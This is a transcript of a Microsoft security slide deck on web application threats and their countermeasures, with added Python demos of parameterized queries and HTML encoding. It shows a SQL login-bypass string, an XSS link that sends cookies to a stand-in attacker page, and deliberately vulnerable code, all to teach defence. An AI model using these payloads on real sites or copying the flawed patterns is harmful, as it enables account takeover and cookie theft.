Transcript of: Threats and Threat Modeling…
Security:Threats and Countermeasures
Stanley Tan
Academic Program Manager
Microsoft Singapore
Session Agenda
Types of threats
Threats against the application
Countermeasures against the threats
Types of Threats
Threats against the network: spoofed packets, etc.
Threats against the host: buffer overflows, illicit paths, etc.
Threats against the application: SQL injection, XSS, input tampering, etc.
Threats Against the Application

| Threat | Examples |
| --- | --- |
| SQL injection | Including a DROP TABLE command in text typed into an input field |
| Cross-site scripting | Using malicious client-side script to steal cookies |
| Hidden-field tampering | Maliciously changing the value of a hidden field |
| Eavesdropping | Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections |
| Session hijacking | Using a stolen session ID cookie to access someone else's session state |
| Identity spoofing | Using a stolen forms authentication cookie to pose as another user |
| Information disclosure | Allowing the client to see a stack trace when an unhandled exception occurs |

http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh10.asp?frame=true#c10618429_004i
SQL Injection
Exploits applications that use external input in database commands
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter used to generate SQL commands
Submit input that modifies the commands
Compromise, corrupt, and destroy data
SQL Injection
How SQL Injection Works

Model query:
SELECT COUNT(*) FROM Users WHERE UserName='Jeff' AND Password='imbatman'

Malicious query:
SELECT COUNT(*) FROM Users WHERE UserName='' or 1=1-- AND Password=''

"or 1=1" matches every record in the table; "--" comments out the remainder of the query
Accessing Data Securely
Use stored procedures or parameterized commands in lieu of dynamic SQL commands
Never use sa to access Web databases
Store connection strings securely
Optionally use SSL/TLS or IPSec to secure the connection to the database server
Apply administrative protections to SQL Server
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp
Dynamic SQL Commands

```csharp
// DANGER! User input used to generate database query
string sql = String.Format(
    "select count (*) from users where username='{0}' and " +
    "cast (password as varbinary)=cast ('{1}' as varbinary)",
    username, password);
SqlCommand command = new SqlCommand(sql, connection);
int count = (int) command.ExecuteScalar();
```

Vulnerable to SQL injection attacks
Parameterized Commands

```csharp
// BETTER: Input passed to parameterized command
SqlCommand command = new SqlCommand(
    "select count (*) from users where username=@username and " +
    "cast (password as varbinary)=cast (@password as varbinary)",
    connection);
command.Parameters.Add("@username", SqlDbType.VarChar).Value = username;
command.Parameters.Add("@password", SqlDbType.VarChar).Value = password;
int count = (int) command.ExecuteScalar();
```

Less vulnerable to SQL injection attacks
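The two slides above show the dynamic and the parameterized query side by side but not what actually happens when the "' or 1=1--" input from the "How SQL Injection Works" slide reaches each one. The following added example (not code from the deck; it uses Python's standard sqlite3 module and a constructed two-row Users table) runs both login checks against the same input so the difference is observable: the dynamic version counts every row, the parameterized version treats the payload as an ordinary, non-matching user name.

```python
import sqlite3

# Constructed sample data, not from the slides: a tiny in-memory Users table.
SAMPLE_USERS = [("Jeff", "imbatman"), ("alice", "s3cret")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_dynamic(conn, username, password):
    """The DANGER pattern: user input is spliced into the SQL text itself."""
    sql = ("SELECT COUNT(*) FROM Users WHERE UserName='%s' AND Password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0]


def login_parameterized(conn, username, password):
    """The BETTER pattern: the SQL text is fixed, values travel as parameters."""
    sql = "SELECT COUNT(*) FROM Users WHERE UserName=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchone()[0]


def demo():
    """Run both checks with a valid login and with the slide's malicious input."""
    conn = make_db()
    injected = "' or 1=1--"   # the malicious input from the slide
    return {
        "dynamic_valid": login_dynamic(conn, "Jeff", "imbatman"),
        "dynamic_injected": login_dynamic(conn, injected, ""),
        "param_valid": login_parameterized(conn, "Jeff", "imbatman"),
        "param_injected": login_parameterized(conn, injected, ""),
    }


if __name__ == "__main__":
    for label, count in demo().items():
        print(f"{label}: {count}")
```

With the dynamic version the injected statement becomes `... WHERE UserName='' or 1=1--' AND Password=''`, so the password clause is commented away and the count equals the table size; with the parameterized version the driver never reinterprets the value as SQL, so the count is zero. A login routine that treats any count greater than zero as success is therefore bypassed only in the first case.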
YASID
Why you really want to secure yourself against SQL injection attacks
Cross-Site Scripting (XSS)
Exploits applications that echo raw, unfiltered input to Web pages
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter whose value is echoed to the Web page
Enter malicious script and get an unwary user to navigate to the infected page
Steal cookies, deface and disable sites
How Cross-Site Scripting Works
<a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>">…</a>

Query string contains embedded JavaScript that redirects to the attacker's page and transmits cookies issued by Search.aspx in a query string
URL of the site targeted by the attack
Cross-Site Scripting
Validating Input
Filter potentially injurious characters and strings
HTML-encode all input echoed to a Web page
Avoid using file names as input if possible
http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh10.asp?frame=true#c10618429_006i
Use "safe" character encodings
<globalization requestEncoding="ISO-8859-1" responseEncoding="ISO-8859-1" />
Anti-XSS Library
Download from MSDN:
http://www.microsoft.com/downloads/details.aspx?familyid=9A2B9C92-7AD9-496C-9A89-AF08DE2E5982&displaylang=en
The Anti-Cross Site Scripting Library can be used to provide comprehensive protection to Web-based applications against Cross-Site Scripting (XSS) attacks.
Input Validation
Why you shouldn’t use file names as input…
Hidden-Field Tampering
HTTP is a stateless protocol
No built-in way to persist data from one request to the next
People are stateful beings
Want data persisted between requests
Shopping carts, user preferences, etc.
Web developers sometimes use hidden fields to persist data between requests
Hidden fields are not really hidden!
How HF Tampering Works

Page contains this…
<input type="hidden" name="price" value="$10,000">

Postback data should contain this…
price="$10,000"

Instead it contains this…
price="$1"

type="hidden" prevents the field from being seen on the page but not in View Source
Information Disclosure
Which is the better error message?
Information Disclosure
This is Insecure Code!

```html
<html>
<body>
<form runat="server">
  <asp:TextBox ID="Input" runat="server" />
  <asp:Button Text="Click Me" OnClick="OnSubmit" runat="server" />
  <asp:Label ID="Output" runat="server" />
</form>
</body>
</html>
<script language="C#" runat="server">
void OnSubmit(Object sender, EventArgs e)
{
    Output.Text = "Hello, " + Input.Text;
}
</script>
```
Why is This Code Insecure?
In the code above, the input is echoed to the page without HTML encoding, and the input is neither validated nor constrained: the user can type anything!
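The "Validating Input" slide names the two fixes for this code (HTML-encode everything echoed to the page, and constrain what is accepted), and the insecure page above shows neither. The following added example (my code, not the deck's, and not the Anti-XSS Library) reproduces the OnSubmit concatenation in Python, puts the encoded and constrained versions beside it, and feeds it the script pattern from the "How Cross-Site Scripting Works" slide so the effect of each fix is visible. The name pattern is an assumption chosen for illustration.

```python
import html
import re

# Constructed inputs: an ordinary name, and the cookie-stealing script pattern
# from the slide, written out as the text a user might type into the box.
NORMAL_INPUT = "Jeff"
SCRIPT_INPUT = ("<script>document.location.replace("
                "'http://localhost/EvilPage.aspx?Cookie=' + document.cookie)</script>")

# Assumed constraint for a "name" field: letters, spaces, apostrophes, hyphens,
# at most 50 characters. Real rules depend on the application.
NAME_PATTERN = re.compile(r"^[A-Za-z][A-Za-z '\-]{0,49}$")


def greet_unsafe(text):
    """Mirrors the slide's OnSubmit: raw input concatenated into the page."""
    return "Hello, " + text


def greet_encoded(text):
    """HTML-encode before echoing: <, >, &, quotes become inert entities."""
    return "Hello, " + html.escape(text, quote=True)


def validate_name(text):
    """Constrain input to what a name can look like; reject everything else."""
    return NAME_PATTERN.fullmatch(text) is not None


def greet(text):
    """Validate first, then encode: the two controls complement each other."""
    if not validate_name(text):
        return None
    return greet_encoded(text)


if __name__ == "__main__":
    for label, text in (("normal", NORMAL_INPUT), ("script", SCRIPT_INPUT)):
        print(label, "unsafe  :", greet_unsafe(text))
        print(label, "encoded :", greet_encoded(text))
        print(label, "checked :", greet(text))
```

Encoding alone already makes the echoed script harmless, because the browser renders `&lt;script&gt;` as text rather than executing it; the validation step additionally keeps junk out of anything downstream (logs, database, other pages) that might not encode on output. Note that `html.escape` with `quote=True` also turns an apostrophe into `&#x27;`, which is the right behaviour when the value may land inside an attribute.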
© 2006 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.